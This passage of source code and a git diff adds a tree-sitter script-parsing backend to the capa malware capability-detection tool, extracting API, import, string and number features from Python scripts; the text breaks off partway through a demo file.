class ScriptAddress(Address):
    """an address for a location within a script file (line, column).

    coordinates come from tree-sitter's `start_point`, which is 0-indexed —
    line 0 / column 0 is the first character of the file.
    """

    def __init__(self, line: int, column: int = 0):
        # both coordinates must be non-negative; the original only validated
        # `line`, silently accepting invalid negative columns.
        assert line >= 0
        assert column >= 0
        self.line = line
        self.column = column

    def __eq__(self, other):
        # equal only to another ScriptAddress at the same (line, column);
        # addresses of other types are never equal.
        if isinstance(other, ScriptAddress):
            return (self.line, self.column) == (other.line, other.column)
        return False

    def __lt__(self, other):
        # ordering is only defined within the same address type,
        # matching the other capa address classes.
        assert isinstance(other, ScriptAddress)
        return (self.line, self.column) < (other.line, other.column)

    def __hash__(self):
        return hash((self.line, self.column))

    def __repr__(self):
        return f"script(line={self.line}, col={self.column})"
"""
Script analysis backend for capa.

Uses tree-sitter to parse scripts into ASTs and extract features
for capability detection. The architecture is modular: core
infrastructure is language-agnostic, and each supported language
implements a LanguageHandler plugin.

Supported languages:
  - Python (via tree-sitter-python)

To add a new language:
  1. Create a handler in capa/features/extractors/script/languages/
  2. Register it in LANGUAGE_HANDLERS below
"""

import re
import logging
from pathlib import Path

logger = logging.getLogger(__name__)

# mapping from language name to file extensions (without dot, lowercase)
SCRIPT_EXTENSIONS: dict[str, tuple[str, ...]] = {
    "python": ("py", "py3", "pyw"),
}

# shebang patterns: compiled regex -> language name
SHEBANG_PATTERNS: list[tuple[re.Pattern, str]] = [
    (re.compile(rb"^#!.*\bpython[23]?\b"), "python"),
]


def detect_script_language(path: Path, buf: bytes) -> str:
    """
    Detect the scripting language of the given file.

    Checks in order:
      1. File extension (case-insensitive)
      2. Shebang line

    args:
      path: path to the script file.
      buf: raw bytes of the file.

    returns:
      the language name (e.g., "python"), or empty string if unknown.
    """
    # 1. check file extension.
    # compare case-insensitively: samples routinely arrive with uppercase
    # or mixed-case extensions (e.g. "DROPPER.PY"), and the previous exact
    # comparison missed those entirely.
    suffix = path.suffix.lstrip(".").lower()
    for language, extensions in SCRIPT_EXTENSIONS.items():
        if suffix in extensions:
            return language

    # 2. check shebang line (only the first line of the file matters)
    first_line = buf.split(b"\n", 1)[0]
    for pattern, language in SHEBANG_PATTERNS:
        if pattern.match(first_line):
            return language

    return ""
"""
ScriptFeatureExtractor — the main extractor for script analysis.

Implements capa's StaticFeatureExtractor interface using tree-sitter
for AST-based feature extraction. Language-specific logic is delegated
to LanguageHandler instances (e.g., PythonLanguageHandler).

Scope mapping for scripts:
  - File scope: entire script (imports, global strings, etc.)
  - Function scope: each function definition in the script
  - Basic block: one BB per function (like dnfile for .NET)
  - Instruction: each statement-level AST node
"""

import hashlib
import logging
from typing import Iterator
from pathlib import Path

from tree_sitter import Parser

import capa.features.extractors.script.file
import capa.features.extractors.script.insn
from capa.features.insn import API
from capa.features.common import OS, ARCH_ANY, OS_ANY, FORMAT_SCRIPT, Arch, Format, Feature, String
from capa.features.address import NO_ADDRESS, Address, ScriptAddress
from capa.features.extractors.script import detect_script_language
from capa.features.extractors.script.lang_base import ImportContext, LanguageHandler
from capa.features.extractors.script.languages.python import PythonLanguageHandler
from capa.features.extractors.base_extractor import (
    BBHandle,
    InsnHandle,
    SampleHashes,
    FunctionHandle,
    StaticFeatureExtractor,
)

logger = logging.getLogger(__name__)


# registry of language handlers
LANGUAGE_HANDLERS: dict[str, LanguageHandler] = {
    "python": PythonLanguageHandler(),
}


class ScriptFeatureExtractor(StaticFeatureExtractor):
    """
    Feature extractor for scripting languages using tree-sitter.

    This extractor:
      1. Detects the script language (via extension/shebang)
      2. Parses the script with the appropriate tree-sitter grammar
      3. Delegates feature extraction to a LanguageHandler plugin
      4. Yields features following capa's scope hierarchy

    The design mirrors existing backends (dnfile, vivisect):
      - Global features: format, OS, arch
      - File features: imports, strings
      - Function features: one per function definition
      - Basic block: one per function body (like dnfile)
      - Instruction features: one per statement in function body
    """

    def __init__(self, path: Path, language: str = ""):
        buf = path.read_bytes()
        self.path = path
        self.buf = buf

        md5 = hashlib.md5(buf).hexdigest()
        sha1 = hashlib.sha1(buf).hexdigest()
        sha256 = hashlib.sha256(buf).hexdigest()
        super().__init__(
            hashes=SampleHashes(
                md5=md5,
                sha1=sha1,
                sha256=sha256,
            )
        )

        # detect language when the caller did not pin one explicitly
        if not language:
            language = detect_script_language(path, buf)
            if not language:
                raise ValueError(f"unable to detect script language for: {path}")

        self.language = language

        # get the language handler
        if language not in LANGUAGE_HANDLERS:
            raise ValueError(f"unsupported script language: {language}")
        self.handler: LanguageHandler = LANGUAGE_HANDLERS[language]

        # parse the script with tree-sitter
        parser = Parser(self.handler.get_tree_sitter_language())
        self.tree = parser.parse(buf)

        # pre-compute import context for API name resolution
        self.import_ctx: ImportContext = self.handler.extract_imports(self.tree)

        # function names keyed by address, recorded as get_functions()
        # enumerates the script and served by get_function_name().
        # previously the names were computed but never exposed.
        self._function_names: dict[Address, str] = {}

        # pre-compute global features (yielded at every scope)
        self.global_features: list[tuple[Feature, Address]] = []
        self.global_features.append((Format(FORMAT_SCRIPT), NO_ADDRESS))
        self.global_features.append((OS(OS_ANY), NO_ADDRESS))
        self.global_features.append((Arch(ARCH_ANY), NO_ADDRESS))

    def get_base_address(self) -> Address:
        # scripts have no load address; line/column addressing is absolute
        return NO_ADDRESS

    def extract_global_features(self) -> Iterator[tuple[Feature, Address]]:
        yield from self.global_features

    def extract_file_features(self) -> Iterator[tuple[Feature, Address]]:
        yield from capa.features.extractors.script.file.extract_features(
            self.tree, self.handler, self.buf
        )

    def get_functions(self) -> Iterator[FunctionHandle]:
        """
        Yield a FunctionHandle for each function definition in the script.

        The inner object is the tree-sitter Node for the function definition.
        Context stores the import context for name resolution.
        """
        for node in self.handler.get_function_nodes(self.tree):
            name = self.handler.get_function_name(node)
            addr = ScriptAddress(
                line=node.start_point[0],
                column=node.start_point[1],
            )
            # remember the name so get_function_name() can answer later
            self._function_names[addr] = name
            yield FunctionHandle(
                address=addr,
                inner=node,
                ctx={"handler": self.handler, "import_ctx": self.import_ctx, "name": name},
            )

    def extract_function_features(self, fh: FunctionHandle) -> Iterator[tuple[Feature, Address]]:
        # no function-scope features in the skeleton
        # future: call count, decorator characteristics, etc.
        yield from ()

    def get_basic_blocks(self, fh: FunctionHandle) -> Iterator[BBHandle]:
        """
        Yield one basic block per function (like dnfile).

        Scripts don't have basic blocks in the traditional sense,
        so we treat the entire function body as a single block.
        """
        yield BBHandle(
            address=fh.address,
            inner=fh.inner,
        )

    def extract_basic_block_features(
        self, fh: FunctionHandle, bbh: BBHandle
    ) -> Iterator[tuple[Feature, Address]]:
        # no basic-block-scope features in the skeleton
        yield from ()

    def get_instructions(self, fh: FunctionHandle, bbh: BBHandle) -> Iterator[InsnHandle]:
        """
        Yield an InsnHandle for each statement in the function body.

        Each statement-level AST node maps to one "instruction" in capa's model.
        """
        handler: LanguageHandler = fh.ctx["handler"]
        for node in handler.get_statement_nodes(fh.inner):
            addr = ScriptAddress(
                line=node.start_point[0],
                column=node.start_point[1],
            )
            yield InsnHandle(
                address=addr,
                inner=node,
            )

    def extract_insn_features(
        self, fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle
    ) -> Iterator[tuple[Feature, Address]]:
        yield from capa.features.extractors.script.insn.extract_features(fh, bbh, ih)

    def is_library_function(self, addr: Address) -> bool:
        # scripts don't have library functions in the traditional sense
        return False

    def get_function_name(self, addr: Address) -> str:
        # names are recorded lazily as get_functions() runs; addresses that
        # were never enumerated (or functions without a name node) yield "".
        return self._function_names.get(addr, "")
"""
File-scope feature extraction for scripts.

Extracts features that apply to the entire script file:
  - Import features (from import statements)
  - String features (from file-level string scanning)
"""

import logging
from typing import Callable, Iterator

from tree_sitter import Tree

import capa.features.extractors.common
from capa.features.file import Import
from capa.features.common import String, Feature
from capa.features.address import NO_ADDRESS, Address, ScriptAddress
from capa.features.extractors.script.lang_base import LanguageHandler

logger = logging.getLogger(__name__)


def extract_file_import_features(
    tree: Tree, handler: LanguageHandler, buf: bytes
) -> Iterator[tuple[Feature, Address]]:
    """
    Yield one Import feature per imported name.

    Both explicitly imported names (with their fully-qualified paths)
    and wildcard-imported modules contribute features.
    """
    import_ctx = handler.extract_imports(tree)

    for qualified in import_ctx.names.values():
        yield Import(qualified), NO_ADDRESS

    for wildcard_module in import_ctx.wildcard_modules:
        yield Import(wildcard_module), NO_ADDRESS


def extract_file_string_features(
    tree: Tree, handler: LanguageHandler, buf: bytes
) -> Iterator[tuple[Feature, Address]]:
    """
    Yield string features found by byte-level scanning of the raw file.

    Reuses capa's generic string extraction (ASCII + UTF-16 LE), which
    also surfaces strings that never appear in the AST (comments,
    docstrings, encoded data).
    """
    yield from capa.features.extractors.common.extract_file_strings(buf)


FILE_HANDLERS: tuple[
    Callable[[Tree, LanguageHandler, bytes], Iterator[tuple[Feature, Address]]],
    ...,
] = (
    extract_file_import_features,
    extract_file_string_features,
)


def extract_features(
    tree: Tree, handler: LanguageHandler, buf: bytes
) -> Iterator[tuple[Feature, Address]]:
    """
    Yield all file-scope features for the script.

    args:
      tree: the parsed tree-sitter Tree.
      handler: the language handler for this script.
      buf: raw bytes of the file.

    yields:
      (Feature, Address): file-scope features.
    """
    for file_handler in FILE_HANDLERS:
        yield from file_handler(tree, handler, buf)
def extract_insn_api_features(
    fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle
) -> Iterator[tuple[Feature, Address]]:
    """
    Yield API (function call) features for the given statement.

    Call resolution is language-specific (imports, aliases), so this
    forwards to the language handler attached to the function context
    together with the script-wide import context.
    """
    lang_handler: LanguageHandler = fh.ctx["handler"]
    import_ctx: ImportContext = fh.ctx["import_ctx"]
    yield from lang_handler.extract_insn_api_features(ih.inner, import_ctx)


def extract_insn_string_features(
    fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle
) -> Iterator[tuple[Feature, Address]]:
    """Yield string literal features for the given statement."""
    lang_handler: LanguageHandler = fh.ctx["handler"]
    yield from lang_handler.extract_insn_string_features(ih.inner)


def extract_insn_number_features(
    fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle
) -> Iterator[tuple[Feature, Address]]:
    """Yield numeric literal features for the given statement."""
    lang_handler: LanguageHandler = fh.ctx["handler"]
    yield from lang_handler.extract_insn_number_features(ih.inner)


INSTRUCTION_HANDLERS: tuple[
    Callable[[FunctionHandle, BBHandle, InsnHandle], Iterator[tuple[Feature, Address]]],
    ...,
] = (
    extract_insn_api_features,
    extract_insn_string_features,
    extract_insn_number_features,
)


def extract_features(
    fh: FunctionHandle, bbh: BBHandle, ih: InsnHandle
) -> Iterator[tuple[Feature, Address]]:
    """
    Yield all instruction-scope features for the given statement.

    args:
      fh: the function handle containing the statement.
      bbh: the basic block handle (function body).
      ih: the instruction handle (statement node).

    yields:
      (Feature, Address): instruction-scope features.
    """
    for insn_handler in INSTRUCTION_HANDLERS:
        yield from insn_handler(fh, bbh, ih)
@dataclass
class ImportContext:
    """
    Records the import statements of a script and the aliases they bind.

    The handlers use this to map local call names back to fully-qualified
    module paths:

        `import os`                  -> names = {"os": "os"}
        `import os as o`             -> names = {"o": "os"}
        `from os.path import join`   -> names = {"join": "os.path.join"}
        `from os.path import *`      -> wildcard_modules = {"os.path"}

    A call such as `o.system(...)` is resolved by looking up "o" in
    `names` ("os") and rebuilding the dotted path ("os.system").
    """

    # local name -> fully-qualified module/attribute path
    names: dict[str, str] = field(default_factory=dict)

    # modules pulled in via `from X import *`; individual names from
    # these cannot be resolved, only recorded
    wildcard_modules: set[str] = field(default_factory=set)

    def resolve_name(self, name: str) -> str:
        """
        Map a local name back to its fully-qualified import path.

        Returns the input unchanged when the name was never imported
        (e.g., a builtin or a locally-defined function).
        """
        try:
            return self.names[name]
        except KeyError:
            return name


class LanguageHandler(abc.ABC):
    """
    Plugin interface for language-specific AST feature extraction.

    Each supported scripting language (Python, Bash, PowerShell, etc.)
    implements this interface. The core ScriptFeatureExtractor uses it
    to walk the AST and extract features without knowing any
    language-specific details.

    To add a new language:
      1. Subclass LanguageHandler
      2. Implement all abstract methods
      3. Register in the LANGUAGE_HANDLERS dict in __init__.py
    """

    @abc.abstractmethod
    def get_tree_sitter_language(self):
        """
        Return the tree-sitter Language (grammar) object for this language.
        """
        ...

    @abc.abstractmethod
    def get_function_nodes(self, tree: Tree) -> Iterator[Node]:
        """
        Yield the AST nodes of `tree` that represent function definitions.
        """
        ...

    @abc.abstractmethod
    def get_function_name(self, node: Node) -> str:
        """
        Return the name of the function defined by `node`.
        """
        ...

    @abc.abstractmethod
    def get_statement_nodes(self, node: Node) -> Iterator[Node]:
        """
        Yield the statement-level AST nodes within the body of function
        definition `node`; these map to capa's "instruction" scope.
        """
        ...

    @abc.abstractmethod
    def extract_imports(self, tree: Tree) -> ImportContext:
        """
        Parse the import statements of `tree` and return the resulting
        ImportContext for name resolution.
        """
        ...

    @abc.abstractmethod
    def extract_insn_api_features(
        self, node: Node, ctx: ImportContext
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Yield (API feature, script address) pairs for the function calls in
        statement `node`, resolving names through `ctx`.
        """
        ...

    @abc.abstractmethod
    def extract_insn_string_features(
        self, node: Node
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Yield (String feature, script address) pairs for the string literals
        in statement `node`.
        """
        ...

    @abc.abstractmethod
    def extract_insn_number_features(
        self, node: Node
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Yield (Number feature, script address) pairs for the numeric literals
        in statement `node`.
        """
        ...
"""
Python language handler for tree-sitter-based script analysis.

Maps Python AST node types to capa's feature model:
  - function_definition -> function scope
  - call / attribute -> API features (with import resolution)
  - import_statement / import_from_statement -> Import features
  - string / concatenated_string -> String features
  - integer / float -> Number features

Handles edge cases:
  - import aliasing (import X as Y)
  - from-imports (from os.path import join)
  - decorators (decorated_definition unwrapping)
  - nested/chained calls (recursive AST walk)
  - string prefixes (b/r/f/u, any case, any combination)

TODO: dynamic imports (__import__, importlib.import_module) and
imports nested inside function bodies are not yet resolved.
"""

import logging
from typing import Iterator

import tree_sitter_python as tspython
from tree_sitter import Language, Node, Parser, Tree

from capa.features.insn import API, Number
from capa.features.common import String, Feature
from capa.features.address import Address, ScriptAddress
from capa.features.extractors.script.lang_base import ImportContext, LanguageHandler

logger = logging.getLogger(__name__)


class PythonLanguageHandler(LanguageHandler):
    """
    Python-specific implementation of the LanguageHandler interface.

    Uses tree-sitter-python grammar to parse Python scripts and extract
    features that map to capa's feature model.
    """

    PY_LANGUAGE = Language(tspython.language())

    def get_tree_sitter_language(self):
        return self.PY_LANGUAGE

    def get_function_nodes(self, tree: Tree) -> Iterator[Node]:
        """
        Yield top-level function definition nodes from the AST.

        Does not descend into nested function definitions — those
        are left as statement nodes within their parent function.

        NOTE(review): `async def` is assumed to also parse as
        function_definition in tree-sitter-python — confirm against the
        pinned grammar version.
        """
        for child in tree.root_node.children:
            if child.type in ("function_definition", "decorated_definition"):
                yield child

    def get_function_name(self, node: Node) -> str:
        """
        Extract function name from a function_definition or decorated_definition node.
        """
        # decorated_definition wraps the actual function_definition
        if node.type == "decorated_definition":
            for child in node.children:
                if child.type == "function_definition":
                    node = child
                    break

        name_node = node.child_by_field_name("name")
        if name_node is not None:
            return name_node.text.decode("utf-8")
        return ""

    def get_statement_nodes(self, node: Node) -> Iterator[Node]:
        """
        Yield statement-level nodes from a function body.

        These map to capa's "instruction" scope. For a function_definition,
        the body is the `block` child node — we yield each direct child statement.
        """
        # unwrap decorated_definition
        func_node = node
        if node.type == "decorated_definition":
            for child in node.children:
                if child.type == "function_definition":
                    func_node = child
                    break

        body = func_node.child_by_field_name("body")
        if body is None:
            return

        for child in body.children:
            yield child

    def extract_imports(self, tree: Tree) -> ImportContext:
        """
        Parse all module-level import statements and build an ImportContext.

        Handles:
          - import os                      -> names["os"] = "os"
          - import os as o                 -> names["o"] = "os"
          - from os.path import join       -> names["join"] = "os.path.join"
          - from os.path import join as j  -> names["j"] = "os.path.join"
          - from os.path import *          -> wildcard_modules.add("os.path")
        """
        ctx = ImportContext()

        for child in tree.root_node.children:
            if child.type == "import_statement":
                self._process_import_statement(child, ctx)
            elif child.type == "import_from_statement":
                self._process_import_from_statement(child, ctx)

        return ctx

    def _process_import_statement(self, node: Node, ctx: ImportContext) -> None:
        """
        Process `import X`, `import X as Y`, `import X.Y.Z`.
        """
        for child in node.children:
            if child.type == "dotted_name":
                # import os, import os.path
                module_name = child.text.decode("utf-8")
                ctx.names[module_name] = module_name
            elif child.type == "aliased_import":
                # import os as o
                name_node = child.child_by_field_name("name")
                alias_node = child.child_by_field_name("alias")
                if name_node is not None and alias_node is not None:
                    module_name = name_node.text.decode("utf-8")
                    alias = alias_node.text.decode("utf-8")
                    ctx.names[alias] = module_name

    def _process_import_from_statement(self, node: Node, ctx: ImportContext) -> None:
        """
        Process `from X import Y`, `from X import Y as Z`, `from X import *`.
        """
        module_node = node.child_by_field_name("module_name")
        if module_node is None:
            return

        module_name = module_node.text.decode("utf-8")

        for child in node.children:
            # skip the module_name node itself — it's also a dotted_name
            # and would otherwise be mistaken for an imported name
            if child.id == module_node.id:
                continue

            if child.type == "wildcard_import":
                ctx.wildcard_modules.add(module_name)
                logger.debug("wildcard import from %s — individual names cannot be resolved", module_name)
            elif child.type == "dotted_name":
                # from os.path import join
                imported_name = child.text.decode("utf-8")
                ctx.names[imported_name] = f"{module_name}.{imported_name}"
            elif child.type == "aliased_import":
                # from os.path import join as j
                name_node = child.child_by_field_name("name")
                alias_node = child.child_by_field_name("alias")
                if name_node is not None and alias_node is not None:
                    imported_name = name_node.text.decode("utf-8")
                    alias = alias_node.text.decode("utf-8")
                    ctx.names[alias] = f"{module_name}.{imported_name}"

    def extract_insn_api_features(
        self, node: Node, ctx: ImportContext
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Extract API (function call) features from a statement node.

        Recursively walks child nodes to handle nested calls like:
            base64.b64decode(urllib.request.urlopen(url).read())

        For each call node, resolves the function name using the ImportContext:
          - `os.system(...)` with `import os`            -> API("os.system")
          - `join(...)` with `from os.path import join`  -> API("os.path.join")
          - `open(...)` (built-in)                       -> API("open")
        """
        yield from self._extract_calls_recursive(node, ctx)

    def _extract_calls_recursive(
        self, node: Node, ctx: ImportContext
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Recursively walk AST nodes to find all call expressions.
        """
        if node.type == "call":
            func_node = node.child_by_field_name("function")
            if func_node is not None:
                api_name = self._resolve_call_name(func_node, ctx)
                if api_name:
                    addr = ScriptAddress(
                        line=node.start_point[0],
                        column=node.start_point[1],
                    )
                    yield API(api_name), addr

        # recurse into all children to find nested calls
        for child in node.children:
            yield from self._extract_calls_recursive(child, ctx)

    def _resolve_call_name(self, func_node: Node, ctx: ImportContext) -> str:
        """
        Resolve the fully-qualified name of a function call.

        Handles:
          - identifier: `open(...)` -> "open" or resolved via ImportContext
          - attribute: `os.system(...)` -> resolved via ImportContext
          - chained attributes: `urllib.request.urlopen(...)` -> resolved
        """
        if func_node.type == "identifier":
            name = func_node.text.decode("utf-8")
            return ctx.resolve_name(name)

        elif func_node.type == "attribute":
            # e.g., os.system, urllib.request.urlopen
            parts = self._collect_attribute_chain(func_node)
            if not parts:
                return ""

            # try to resolve the root (e.g., "os" in "os.system")
            root = parts[0]
            resolved_root = ctx.resolve_name(root)
            if resolved_root != root:
                # the root was an import alias
                parts[0] = resolved_root

            return ".".join(parts)

        return ""

    def _collect_attribute_chain(self, node: Node) -> list[str]:
        """
        Collect the chain of attribute accesses into a list of names.

        e.g., `urllib.request.urlopen` -> ["urllib", "request", "urlopen"]

        Handles calls on call results like `urlopen(url).read()` by
        stopping at the call boundary.
        """
        if node.type == "identifier":
            return [node.text.decode("utf-8")]
        elif node.type == "attribute":
            obj_node = node.child_by_field_name("object")
            attr_node = node.child_by_field_name("attribute")
            if obj_node is not None and attr_node is not None:
                obj_parts = self._collect_attribute_chain(obj_node)
                attr_name = attr_node.text.decode("utf-8")
                return obj_parts + [attr_name]
        elif node.type == "call":
            # method call on a call result, e.g., urlopen(url).read()
            # we stop at the call boundary — the method name ("read")
            # is handled by the parent attribute node
            func_node = node.child_by_field_name("function")
            if func_node is not None:
                return self._collect_attribute_chain(func_node)
        return []

    def extract_insn_string_features(
        self, node: Node
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Extract string literal features from a statement node.

        Recursively finds all string nodes. Handles:
          - simple strings: "hello"
          - concatenated strings: "hello" "world"
          - prefixed strings: b"...", r"...", rb"...", u"..."
          - f-strings: the literal inner text is extracted as-is,
            including interpolation placeholders like "{x}"
        """
        yield from self._extract_strings_recursive(node)

    def _extract_strings_recursive(
        self, node: Node
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Recursively walk AST nodes to find all string literals.
        """
        if node.type == "string":
            value = self._extract_string_value(node)
            # minimum length 4 mirrors capa's byte-level string extraction
            if value and len(value) >= 4:
                addr = ScriptAddress(
                    line=node.start_point[0],
                    column=node.start_point[1],
                )
                yield String(value), addr

        elif node.type == "concatenated_string":
            # each child is a string node
            for child in node.children:
                yield from self._extract_strings_recursive(child)

        else:
            for child in node.children:
                yield from self._extract_strings_recursive(child)

    def _extract_string_value(self, node: Node) -> str:
        """
        Extract the string value from a string node, stripping any
        prefix and the surrounding quotes.

        Fixes two defects in the previous implementation:
          - two-character prefixes (rb"...", br"...") were only half
            stripped (the loop matched "r" first and broke), so the quote
            check failed and the value was lost entirely;
          - the legacy u"..." prefix was not recognized at all.
        """
        text = node.text.decode("utf-8")
        # a valid Python string token is <prefix><quote>...<quote>, where the
        # prefix is any combination of b/r/f/u in either case, so stripping
        # those characters from the left cannot touch the string contents.
        text = text.lstrip("bBrRfFuU")
        # try triple quotes before single ones so """...""" is not
        # mistaken for a '"'-quoted string
        for quote in ('"""', "'''", '"', "'"):
            if text.startswith(quote) and text.endswith(quote) and len(text) >= 2 * len(quote):
                return text[len(quote) : -len(quote)]
        return ""

    def extract_insn_number_features(
        self, node: Node
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Extract numeric literal features from a statement node.

        Handles integers (decimal, hex, octal, binary) and floats.
        """
        yield from self._extract_numbers_recursive(node)

    def _extract_numbers_recursive(
        self, node: Node
    ) -> Iterator[tuple[Feature, Address]]:
        """
        Recursively walk AST nodes to find all numeric literals.
        """
        if node.type == "integer":
            value = self._parse_python_int(node.text.decode("utf-8"))
            if value is not None:
                addr = ScriptAddress(
                    line=node.start_point[0],
                    column=node.start_point[1],
                )
                yield Number(value), addr

        elif node.type == "float":
            try:
                value = float(node.text.decode("utf-8"))
                addr = ScriptAddress(
                    line=node.start_point[0],
                    column=node.start_point[1],
                )
                yield Number(value), addr
            except ValueError:
                pass

        else:
            for child in node.children:
                yield from self._extract_numbers_recursive(child)

    @staticmethod
    def _parse_python_int(s: str) -> int | None:
        """
        Parse a Python integer literal, handling all bases.

        returns None when the text is not a valid integer literal.
        """
        # remove digit-group underscores (e.g., 1_000_000)
        s = s.replace("_", "")
        try:
            if s.startswith(("0x", "0X")):
                return int(s, 16)
            elif s.startswith(("0o", "0O")):
                return int(s, 8)
            elif s.startswith(("0b", "0B")):
                return int(s, 2)
            else:
                return int(s)
        except ValueError:
            return None
elif self.type is AddressType.SCRIPT:
+            assert isinstance(self.value, tuple)
+            line, column = self.value
+            assert isinstance(line, int)
+            assert isinstance(column, int)
+            return capa.features.address.ScriptAddress(line, column)
+
         else:
             assert_never(self.type)
 
diff --git a/capa/helpers.py b/capa/helpers.py
index 27c757dcc6..fb578a9bc0 100644
--- a/capa/helpers.py
+++ b/capa/helpers.py
@@ -52,6 +52,7 @@
     FORMAT_DOTNET,
     FORMAT_FREEZE,
     FORMAT_DRAKVUF,
+    FORMAT_SCRIPT,
     FORMAT_UNKNOWN,
     FORMAT_BINJA_DB,
     FORMAT_BINEXPORT2,
@@ -68,6 +69,7 @@
 EXTENSIONS_ELF = "elf_"
 EXTENSIONS_FREEZE = "frz"
 EXTENSIONS_BINJA_DB = "bndb"
+EXTENSIONS_SCRIPT = (".py", ".py3")
 
 logger = logging.getLogger("capa")
 
@@ -239,6 +241,8 @@ def get_format_from_extension(sample: Path) -> str:
         format_ = FORMAT_BINEXPORT2
     elif sample.name.endswith(EXTENSIONS_BINJA_DB):
         format_ = FORMAT_BINJA_DB
+    elif sample.name.endswith(EXTENSIONS_SCRIPT):
+        format_ = FORMAT_SCRIPT
 
     return format_
 
diff --git a/capa/loader.py b/capa/loader.py
index 939680ab7d..bc78719d34 100644
--- a/capa/loader.py
+++ b/capa/loader.py
@@ -42,6 +42,7 @@
     FORMAT_SC64,
     FORMAT_VMRAY,
     FORMAT_DOTNET,
+    FORMAT_SCRIPT,
     FORMAT_DRAKVUF,
     FORMAT_BINJA_DB,
     FORMAT_BINEXPORT2,
@@ -68,6 +69,7 @@
 BACKEND_BINEXPORT2 = "binexport2"
 BACKEND_IDA = "ida"
 BACKEND_GHIDRA = "ghidra"
+BACKEND_SCRIPT = "script"
 
 
 class CorruptFile(ValueError):
@@ -482,6 +484,12 @@ def __exit__(self, exc_type, exc_val, exc_tb):
         import capa.features.extractors.ghidra.extractor
 
         return capa.features.extractors.ghidra.extractor.GhidraFeatureExtractor(ctx_manager=cm, tmpdir=tmpdir)
+
+    elif backend == BACKEND_SCRIPT:
+        import capa.features.extractors.script.extractor
+
+        return capa.features.extractors.script.extractor.ScriptFeatureExtractor(input_path)
+
     else:
         raise ValueError("unexpected backend: " + backend)
 
@@ -553,6 +561,11 @@ def get_file_extractors(input_file: Path, input_format: str) -> list[FeatureExtr
     elif input_format == FORMAT_BINEXPORT2:
         file_extractors = _get_binexport2_file_extractors(input_file)
 
+    elif input_format == FORMAT_SCRIPT:
+        import capa.features.extractors.script.extractor
+
+        file_extractors.append(capa.features.extractors.script.extractor.ScriptFeatureExtractor(input_file))
+
     return file_extractors
 
diff --git a/capa/main.py b/capa/main.py
index 368d3ecd15..71d6b71534 100644
--- a/capa/main.py
+++ b/capa/main.py
@@ -57,6 +57,7 @@
     BACKEND_FREEZE,
     BACKEND_GHIDRA,
     BACKEND_PEFILE,
+    BACKEND_SCRIPT,
     BACKEND_DRAKVUF,
     BACKEND_BINEXPORT2,
 )
@@ -98,6 +99,7 @@
     STATIC_FORMATS,
     DYNAMIC_FORMATS,
     FORMAT_BINJA_DB,
+    FORMAT_SCRIPT,
     FORMAT_BINEXPORT2,
 )
 from capa.capabilities.common import (
@@ -279,6 +281,7 @@ def install_common_args(parser, wanted=None):
         (FORMAT_FREEZE, "features previously frozen by capa"),
         (FORMAT_BINEXPORT2, "BinExport2"),
         (FORMAT_BINJA_DB, "Binary Ninja Database"),
+        (FORMAT_SCRIPT, "Script file (Python, etc.)"),
     ]
     format_help = ", ".join([f"{f[0]}: {f[1]}" for f in formats])
 
@@ -304,6 +307,7 @@ def install_common_args(parser, wanted=None):
         (BACKEND_CAPE, "CAPE"),
         (BACKEND_DRAKVUF, "DRAKVUF"),
         (BACKEND_VMRAY, "VMRay"),
+        (BACKEND_SCRIPT, "Script (tree-sitter)"),
     ]
     backend_help = ", ".join([f"{f[0]}: {f[1]}" for f in backends])
     parser.add_argument(
@@ -600,6 +604,9 @@ def get_backend_from_cli(args, input_format: str) -> str:
     elif input_format == FORMAT_BINEXPORT2:
         return BACKEND_BINEXPORT2
 
+    elif input_format == FORMAT_SCRIPT:
+        return BACKEND_SCRIPT
+
     else:
         return BACKEND_VIV
 
diff --git a/pyproject.toml b/pyproject.toml
index 204910dda7..2af79c0f59 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -181,6 +181,10 @@ scripts = [
 ghidra = [
     "pyghidra>=3.0.0",
 ]
+script = [
+    "tree-sitter>=0.24",
+    "tree-sitter-python>=0.23",
+]
 
 [tool.deptry]
 extend_exclude = [
diff --git a/treesitter_demo.py b/treesitter_demo.py
new file mode 100644
index 0000000000..9e897d0c59
--- /dev/null
+++ b/treesitter_demo.py
@@ -0,0 +1,129 @@
+"""Tree-sitter capa backend prototype — Bash + Python feature extraction with 
rule matching."""
+
+from dataclasses import dataclass
+from typing import Iterator
+import tree_sitter_bash as tsbash
+import tree_sitter_python as tspython
+from tree_sitter import Language, Parser, Node
+
+# --- Feature types (mirrors capa.features.insn / capa.features.common) ---
+
+@dataclass(frozen=True)
+class API:
+    value: str
+
+@dataclass(frozen=True)
+class String:
+    value: str
+
+@dataclass(frozen=True)
+class Number:
+    value: int
+
+@dataclass(frozen=True)
+class Characteristic:
+    value: str
+
+# --- Address type (like AbsoluteVirtualAddress, but line:col) ---
+
+@dataclass(frozen=True, order=True)  # order=True: min(addrs) below needs __lt__
+class ScriptAddress:
+    line: int
+    col: int
+    @classmethod
+    def from_node(cls, n: Node): return cls(n.start_point[0] + 1, n.start_point[1])
+    def __repr__(self): return f"L{self.line}:{self.col}"
+
+# --- Bash instruction handlers (like viv/insn.py INSTRUCTION_HANDLERS) ---
+
+def bash_api(node):
+    if node.type == "command":
+        name = node.child_by_field_name("name")
+        if name: yield API(name.text.decode())
+
+def bash_string(node):
+    if node.type in ("string", "raw_string"):
+        t = node.text.decode().strip('"').strip("'")
+        if len(t) >= 4: yield String(t)
+
+def bash_number(node):
+    if node.type == "number":
+        try: yield Number(int(node.text.decode()))
+        except ValueError: pass
+
+def bash_char(node):
+    if node.type == "pipeline": yield Characteristic("pipe")
+    if node.type == "redirected_statement": yield Characteristic("redirect")
+
+# --- Python instruction handlers ---
+
+def python_api(node):
+    if node.type == "call":
+        func = node.child_by_field_name("function")
+        if func: yield API(func.text.decode())
+
+def python_string(node):
+    if node.type == "string":
+        t = node.text.decode().strip('"').strip("'")
+        if len(t) >= 4: yield String(t)
+
+def python_number(node):
+    if node.type == "integer":
